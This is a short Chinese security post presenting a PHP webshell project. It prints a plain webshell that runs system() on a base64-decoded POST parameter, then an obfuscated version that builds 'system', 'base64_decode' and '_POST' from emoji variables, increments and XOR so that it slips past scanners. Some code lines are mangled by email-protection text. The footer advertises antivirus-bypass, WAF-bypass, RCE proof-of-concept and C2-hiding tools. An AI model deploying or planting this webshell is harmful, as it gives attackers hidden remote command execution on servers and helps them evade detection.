项目地址:
https://github.com/nightfury99/php-emoji-webshell
0x01 php-emoji-webshell介绍
这个 webshell 没有什么新东西,只是使用相同的技术,如 XOR 和自增操作。
0x02 原webshell代码
<?php
$a = $_POST[4] ? base64_decode($_POST[4]) : 'whoami';
@system($a);
0x03 变成表情符号、自增或异或运算
<?php
$_=[];
[email protected]"$_";
$__=("_"=="_")+("_"=="_");
[email protected]$_[++$__];
$🌏=$_++;
$🤮=$_++;
$🍪=$_++;
$🫣=$_++;
$🧁=$_++;
$🎂=$_++;
$🥃=$_++;
$🍔=$_++;
$🌘=$_++;
$🌗=$_++;
$🌖=$_++;
$🌕=$_++;
$🌒=$_++;
$🌓=$_++;
$🌔=$_++;
$🌰=$_++;
$🍘=$_++;
$🥗=$_++;
$🥥=$_++;
$🍑=$_++;
$🍋=$_++;
$🧇=$_++;
$🌮=$_++;
$🍕=$_++;
$🥯=$_++;
$🍣=$_;
$__++;
$__++;
$__++;
$👿=$🤮.$🌏.$🥥.$🧁.$__;
$__--;
$__--;
$👿.=$__.("#"^"|").$🫣.$🧁.$🍪.$🌔.$🫣.$🧁;
$💀=$🥥.$🥯.$🥥.$🍑.$🧁.$🌒;
$🥳=("#"^"|").($🥥^"#").($🌕^"#").($🌰^"#").($🌮^"#");
$🤯[email protected]${$🥳}[$__] ? $👿(@${$🥳}[$__]) : $🌮.$🍔.$🌔.$🌏.$🌒.$🌘;
@$💀($🤯);
>精彩回顾<
Cobalt Strike免杀脚本生成器|cna脚本|bypassAV
xss bypass备忘单|xss绕过防火墙技巧|xss绕过WAF的方法
【贼详细 | 附PoC工具】Apache HTTPd最新RCE漏洞复现
【神兵利器 | 附下载】一个用于隐藏C2的、开箱即用的Tools
关注我
获得更多精彩
坚持学习与分享!走过路过点个"在看",不会错过
仅用于学习交流,不得用于非法用途
如侵权请私聊公众号删文